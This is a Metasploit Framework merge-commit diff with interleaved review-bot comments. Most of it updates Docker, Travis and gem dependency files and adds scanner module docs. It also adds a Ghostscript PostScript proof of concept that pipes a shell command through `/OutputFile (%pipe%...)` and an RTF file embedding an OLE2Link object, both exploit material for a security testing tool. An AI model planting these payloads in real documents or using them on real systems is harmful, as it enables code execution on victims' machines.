Merge branch 'master' into land-8293-multi-railgun

This commit is contained in:
Brent Cook 2017-05-11 10:05:28 -05:00
commit 8422a7db39
3374 changed files with 7620 additions and 8999 deletions


@ -5,6 +5,10 @@ docker-compose*.yml
docker/
!docker/msfconsole.rc
README.md
.git/
.github/
.ruby-version
.ruby-gemset
.bundle
Gemfile.local
@ -93,3 +97,6 @@ data/meterpreter/ext_server_pivot.*.dll
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant
# no need for rspecs
spec/
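Review bot: `.git/` is excluded from the build context here, while the Dockerfile in the same commit keeps `git` installed on the grounds that the gemspec runs `git ls`; with no repository inside the context that command has nothing to list, so presumably the gemspec falls back to another file list and the Dockerfile comment's premise is stale. Worth confirming that `bundle install` in the image still resolves the gemspec's files with `.git/` absent. A one-line note beside the pattern, e.g. `# no repo in the image: the gemspec's git ls-files must cope without it`, would make that dependency explicit. The file name is not visible in this section; the patterns read as a .dockerignore.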

.gitignore vendored

@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
# local docker compose overrides
docker-compose.local*
# Ignore python bytecode
*.pyc


@ -16,12 +16,15 @@ rvm:
- '2.4.1'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
- CMD=bundle exec rake "cucumber cucumber:boot" CREATE_BINSTUBS=true
- CMD=bundle exec rake spec SPEC_OPTS="--tag content"
- CMD=bundle exec rake spec SPEC_OPTS="--tag ~content"
matrix:
fast_finish: true
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@ -36,7 +39,7 @@ before_script:
- bundle exec rake db:migrate
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
- git diff --exit-code db/schema.rb && $CMD
notifications:
irc: "irc.freenode.org#msfnotify"
@ -49,3 +52,6 @@ branches:
except:
- gh-pages
- metakitty
services:
- docker
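Review bot: The three new `CMD=bundle exec rake …` entries leave the value unquoted, while the ruby-head matrix entry quotes its whole command (`CMD="docker-compose -f …"`); if Travis splits an env entry on whitespace, `CMD` would hold only `bundle` and `$CMD` in the script step would not run the suite, so the value should be quoted the same way, e.g. `- CMD="bundle exec rake spec" SPEC_OPTS="--tag content"`. That form also makes explicit that `SPEC_OPTS` and `CREATE_BINSTUBS` are exported separately rather than being part of the command. The `$CMD` expansion in `script:` is deliberately unquoted so the shell splits it back into words; a short comment above it saying so would stop a later "quoting fix" from breaking it.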


@ -1,13 +1,13 @@
GIT
remote: https://github.com/WinRb/rubyntlm
revision: 7e2daf6076ba55a435d3e345498a7df40faa3d49
revision: 38aaf1d59dd1a443e4a9c0aea2be232cfe262772
branch: master
specs:
rubyntlm (0.6.1)
rubyntlm (0.6.2)
GIT
remote: https://github.com/banister/method_source
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
revision: 0cc6cc8e15d08880585e8cb0c54e13c3cf937c54
branch: master
specs:
method_source (0.8.1)
@ -31,7 +31,7 @@ GIT
PATH
remote: .
specs:
metasploit-framework (4.14.15)
metasploit-framework (4.14.17)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -44,9 +44,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.24)
metasploit-payloads (= 1.2.28)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.8)
metasploit_payloads-mettle (= 0.1.9)
msgpack
nessus_rest
net-ssh
@ -56,7 +56,7 @@ PATH
octokit
openssl-ccm
openvas-omp
packetfu (= 1.1.13.pre)
packetfu
patch_finder
pcaprub
pg
@ -136,7 +136,7 @@ GEM
bcrypt (3.1.11)
bindata (2.4.0)
builder (3.2.3)
capybara (2.13.0)
capybara (2.14.0)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
@ -146,7 +146,7 @@ GEM
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.15.0)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
@ -177,7 +177,7 @@ GEM
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.3)
gherkin (4.1.1)
gherkin (4.1.3)
google-protobuf (3.2.0.2)
googleauth (0.5.1)
faraday (~> 0.9)
@ -222,7 +222,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.24)
metasploit-payloads (1.2.28)
metasploit_data_models (2.0.14)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -233,7 +233,7 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.8)
metasploit_payloads-mettle (0.1.9)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
@ -254,7 +254,7 @@ GEM
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13.pre)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
@ -283,7 +283,7 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.5)
recog (2.1.6)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.4)
@ -299,7 +299,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.12)
rex-exploitation (0.1.13)
jsobfu
metasm
rex-arch
@ -312,7 +312,7 @@ GEM
rex-arch
rex-ole (0.1.5)
rex-text
rex-powershell (0.1.70)
rex-powershell (0.1.71)
rex-random_identifier
rex-text
rex-random_identifier (0.1.2)
@ -333,23 +333,23 @@ GEM
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
rspec-core (3.5.4)
rspec-support (~> 3.5.0)
rspec-expectations (3.5.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-mocks (3.5.0)
rspec-support (~> 3.6.0)
rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-rails (3.5.2)
rspec-support (~> 3.6.0)
rspec-rails (3.6.0)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
rspec-core (~> 3.5.0)
rspec-expectations (~> 3.5.0)
rspec-mocks (~> 3.5.0)
rspec-support (~> 3.5.0)
rspec-support (3.5.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-support (3.6.0)
ruby_smb (0.0.12)
bindata
rubyntlm
@ -383,7 +383,7 @@ GEM
xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.8)
yard (0.9.9)
PLATFORMS
ruby


@ -1,3 +1,4 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
@ -8,14 +9,14 @@ arel, 6.0.4, MIT
arel-helpers, 2.3.0, unknown
aruba, 0.14.2, MIT
bcrypt, 3.1.11, MIT
bindata, 2.3.5, ruby
bindata, 2.4.0, ruby
bit-struct, 0.15.0, ruby
builder, 3.2.3, MIT
bundler, 1.14.6, MIT
capybara, 2.13.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT
contracts, 0.15.0, "Simplified BSD"
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.4.5, MIT
@ -25,31 +26,31 @@ docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.0.1, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.1, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.2.0.2, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.2.2, "New BSD"
grpc, 1.2.5, "New BSD"
i18n, 0.8.1, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.0.3, ruby
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.0, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.1.3, "New BSD"
metasploit-concern, 2.0.3, "New BSD"
metasploit-credential, 2.0.8, "New BSD"
metasploit-framework, 4.14.9, "New BSD"
metasploit-framework, 4.14.17, "New BSD"
metasploit-model, 2.0.3, "New BSD"
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.2.28, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
method_source, 0.8.1, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
@ -68,7 +69,7 @@ octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13.pre, BSD
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pg, 0.20.0, "New BSD"
@ -84,18 +85,18 @@ rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.5, unknown
recog, 2.1.6, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.2, "New BSD"
rex-core, 0.1.9, "New BSD"
rex-encoder, 0.1.3, "New BSD"
rex-exploitation, 0.1.12, "New BSD"
rex-exploitation, 0.1.13, "New BSD"
rex-java, 0.1.4, "New BSD"
rex-mime, 0.1.4, "New BSD"
rex-nop, 0.1.0, unknown
rex-ole, 0.1.5, "New BSD"
rex-powershell, 0.1.70, "New BSD"
rex-powershell, 0.1.71, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.2, "New BSD"
rex-rop_builder, 0.1.2, "New BSD"
@ -106,13 +107,13 @@ rex-text, 0.2.14, "New BSD"
rex-zip, 0.1.2, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec-core, 3.5.4, MIT
rspec-expectations, 3.5.0, MIT
rspec-mocks, 3.5.0, MIT
rspec-rails, 3.5.2, MIT
rspec-support, 3.5.0, MIT
ruby_smb, 0.0.8, "New BSD"
rubyntlm, 0.6.1, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.12, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
@ -127,5 +128,6 @@ timecop, 0.8.1, MIT
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.1, BSD
xmlrpc, 0.3.0, ruby
xpath, 2.0.0, unknown
yard, 0.9.8, MIT
yard, 0.9.9, MIT


@ -0,0 +1,101 @@
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
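Review bot: The new PostScript file carries leftover scratch comments (`%/bigarr 65000 array def`, `%(.) print`, `%{ } loop`, `%asdf`) and no header saying what it is for, which matters here because the `/OutputFile (%pipe%…)` line followed by `.putdeviceparams` makes rendering the file execute a shell command; a reader should not have to work through the program to learn that. Replace the stray comments with a short header after the `%%BoundingBox` line, e.g. `% Test fixture: rendering this file runs a shell command via the %pipe% OutputFile path, so open it only under the test harness.` The `.eqproc`/`.rsdparams` operators are Ghostscript-specific, so the fixture presumably belongs to a Ghostscript module; confirm and name it in the header.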


@ -0,0 +1,33 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author Microsoft}
{\operator Microsoft}
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
MINISTREAM_DATA
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}


@ -1,6 +1,6 @@
version: '2'
services:
ms: &ms
ms:
image: metasploit
build:
context: .
@ -12,7 +12,7 @@ services:
ports:
- 4444:4444
volumes:
- $HOME/.msf4:/root/.msf4
- $HOME/.msf4:/home/msf/.msf4
db:
image: postgres:9.6
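Review bot: The bind mount `$HOME/.msf4:/home/msf/.msf4` now lands in the home of the unprivileged `msf` user created in the Dockerfile, but the host directory keeps the host user's uid, which only matches the container-side uid by coincidence; when it does not, msfconsole cannot write its config, history or loot there. Either document the expectation next to the volume (`# $HOME/.msf4 must be writable by the uid the msf user gets inside the image`) or pass the uid in as a build argument and create the user with it. Dropping the `&ms` anchor is fine as long as no other compose file still references `*ms`.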


@ -1,47 +1,54 @@
FROM ruby:2.3-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--system --jobs=8"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
COPY lib $APP_HOME/lib
RUN apk update && \
apk add \
ruby-bigdecimal \
ruby-bundler \
ruby-io-console \
autoconf \
bison \
subversion \
git \
sqlite \
nmap \
libxslt \
postgresql \
ncurses \
&& apk add --virtual .ruby-builddeps \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
bison \
autoconf \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
apk add \
sqlite-libs \
nmap \
postgresql-libs \
# needed as long as metasploit-framework.gemspec contains a 'git ls'
git \
ncurses \
libcap \
&& apk add --virtual .ruby-builddeps \
autoconf \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
USER $MSF_USER
ADD ./ $APP_HOME
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
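Review bot: `setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)` grants raw-socket and privileged-port capabilities to every process that executes the interpreter, not only msfconsole, and nothing in the file says why; a comment such as `# some modules need raw sockets and ports < 1024; granted on the interpreter because the image runs as $MSF_USER` keeps that decision reviewable. `ADD ./ $APP_HOME` comes after `USER $MSF_USER` but still copies as root, so the tree is root-owned and `$MSF_USER` cannot write inside it; `COPY` is the conventional instruction for local paths, and ownership needs a `RUN chown -R $MSF_USER $APP_HOME` or the copy has to happen before the user switch. Also worth confirming that the `chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb` glob still matches now that `--without development test coverage` is the default, since an empty match fails the build.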


@ -1,7 +1,11 @@
version: '2'
services:
ms: &ms
ms:
build:
args:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
DATABASE_URL: postgres://postgres@db:5432/msf_dev


@ -1,5 +1,10 @@
<ruby>
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
if ENV['LHOST']
lhost = ENV['LHOST']
else
lhost = %x(hostname -i)
end
run_single("setg LHOST #{lhost}")
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
</ruby>
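Review bot: `ENV['DATABASE_URL'].gsub('postrgres://', '')` misspells the scheme, so the substitution never matches a `postgres://` URL and `db_connect` receives the URL untouched; either correct it to `.sub('postgres://', '')` or drop the call if `db_connect` accepts the URL form, but a silent no-op should not stay. `%x(hostname -i)` also returns a trailing newline (and may return several addresses) that is interpolated straight into `setg LHOST`; `lhost = ENV['LHOST'] || %x(hostname -i).strip` covers both branches in one line. The previous `setg LPORT … if ENV['LPORT']` line is removed without replacement, which looks unintentional unless LPORT is now set elsewhere.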


@ -0,0 +1,27 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
4. Do: `set rhosts`
5. Do: `run`
## Scenarios
A run against the backdoor
```
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```


@ -0,0 +1,50 @@
## Vulnerable Application
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
along with `echo`, `time`, `daytime`, and `discard`.
While its possible to run chargen on TCP, the most common implementation is UDP.
The following was done on Kali linux:
1. `apt-get install xinetd`
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
3. Restart the service: `service xinetd restart`
## Verification Steps
1. Install and configure chargen
2. Start msfconsole
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/chargen/chargen_probe
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(chargen_probe) > set verbose true
verbose => true
msf auxiliary(chargen_probe) > run
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,58 @@
## Vulnerable Application
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine.
The protocol itself was designed in the 1970s, and is run in cleartext.
The following was done on Kali linux:
1. `apt-get install inetutils-inetd fingerd`
2. Start the service: `/etc/init.d/inetutils-inetd start`
## Verification Steps
1. Install fingerd
2. Start msfconsole
3. Do: `use auxiliary/scanner/finger/finger_users`
4. Do: `set rhosts`
5. Do: `run`
## Options
**USERS_FILE**
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/finger/finger_users
msf auxiliary(finger_users) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(finger_users) > run
[+] 127.0.0.1:79 - 127.0.0.1:79 - Found user: root
[+] 127.0.0.1:79 - 127.0.0.1:79 Users found: root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [finger](https://nmap.org/nsedoc/scripts/finger.html) script
```
# nmap -p 79 --script finger 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-26 19:35 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
PORT STATE SERVICE
79/tcp open finger
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
| root root tty2 16d Apr 10 19:17 (:0)\x0D
|_root root *pts/3 1d Apr 25 19:11 (192.168.2.175)\x0D
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
```


@ -0,0 +1,93 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
5. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
